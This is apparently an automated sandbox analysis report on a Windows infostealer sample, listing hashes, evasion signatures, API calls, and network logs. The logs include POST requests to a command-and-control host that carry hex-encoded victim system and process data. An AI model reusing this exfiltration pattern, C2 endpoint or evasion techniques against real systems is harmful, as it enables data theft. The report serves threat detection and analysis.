Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1564519
MD5: 2ba6fe9428da32103bb44c955939208d
SHA1: 145b071306f5ad32a9385ff9f89bae6a1ec968e9
SHA256: 1d64908fcbd9560615576da2b9b41ce76fafb939a0f04f559301a1946db4e936
Tags: exeuser-Bitsight
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: -----BEGIN PUBLIC KEY----- 0_2_0055DCF0
Source: file.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Contains functionality to create an SMB header
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [ebp+04h], 424D53FFh 0_2_0059A5B0
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_0059B560
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_0053255D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_005329FF
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1Host: home.twentykx20pt.topAccept: */*Content-Type: application/jsonContent-Length: 557653Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 32 37 39 35 37 34 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic HTTP traffic detected: POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1Host: home.twentykx20pt.topAccept: */*Content-Type: application/jsonContent-Length: 128Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 5c 2f 68 31 3e 5c 6e 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 18.213.123.165 18.213.123.165
Source: Joe Sandbox View IP Address: 34.118.84.150 34.118.84.150
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005FA8C0 recvfrom, 0_2_005FA8C0
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: home.twentykx20pt.top
Source: unknown HTTP traffic detected: POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1Host: home.twentykx20pt.topAccept: */*Content-Type: application/jsonContent-Length: 557653Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 32 37 39 35 37 34 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Thu, 28 Nov 2024 12:09:58 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://.css
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://.jpg
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477
Source: file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI17327684775a1
Source: file.exe, 00000000.00000003.2630054574.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2629897019.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2631723255.00000000016A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477?argument=
Source: file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477fd4
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477http://home.twentykx20pt.top/AMeacCwtwXCq
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://html4/loose.dtd
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: file.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: file.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: file.exe, file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: file.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://httpbin.org/ip
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016D43E8 0_3_016D43E8
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016CBFC9 0_3_016CBFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016CBFA3 0_3_016CBFA3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016D43E8 0_3_016D43E8
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016CBFC9 0_3_016CBFC9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016CBFA3 0_3_016CBFA3
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01711238 0_3_01711238
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0170653D 0_3_0170653D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01702785 0_3_01702785
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005405B0 0_2_005405B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00546FA0 0_2_00546FA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0056F100 0_2_0056F100
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005FB180 0_2_005FB180
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006000E0 0_2_006000E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008BE030 0_2_008BE030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00596210 0_2_00596210
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005FC320 0_2_005FC320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00600420 0_2_00600420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00884410 0_2_00884410
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053E620 0_2_0053E620
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B4780 0_2_008B4780
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005FC770 0_2_005FC770
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0059A7F0 0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00896730 0_2_00896730
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00544940 0_2_00544940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053A960 0_2_0053A960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005EC900 0_2_005EC900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00706AC0 0_2_00706AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007EAAC0 0_2_007EAAC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006C4B60 0_2_006C4B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007EAB2C 0_2_007EAB2C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008A8BF0 0_2_008A8BF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053CBB0 0_2_0053CBB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008BCC70 0_2_008BCC70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008ACD80 0_2_008ACD80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B4D40 0_2_008B4D40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F0D80 0_2_006F0D80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0084AE30 0_2_0084AE30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00882F90 0_2_00882F90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00554F70 0_2_00554F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005FEF90 0_2_005FEF90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F8F90 0_2_005F8F90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005410E6 0_2_005410E6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0089D430 0_2_0089D430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008A35B0 0_2_008A35B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008C1780 0_2_008C1780
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E9880 0_2_005E9880
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00889920 0_2_00889920
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B3A70 0_2_008B3A70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008A1BD0 0_2_008A1BD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00571BE0 0_2_00571BE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00897CC0 0_2_00897CC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007E9C80 0_2_007E9C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00545DB0 0_2_00545DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00543ED0 0_2_00543ED0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00555EB0 0_2_00555EB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B9FE0 0_2_008B9FE0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0054CCD0 appears 55 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005371E0 appears 47 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0070CBC0 appears 104 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0053CAA0 appears 64 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0054CD40 appears 80 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005750A0 appears 101 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005373F0 appears 111 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 006144A0 appears 76 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005375A0 appears 696 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00574F40 appears 335 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 006E7220 appears 102 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00575340 appears 50 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00574FD0 appears 288 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0053C960 appears 37 times
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: dkqxmldn ZLIB complexity 0.9945288575306236
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_0053255D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_005329FF
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
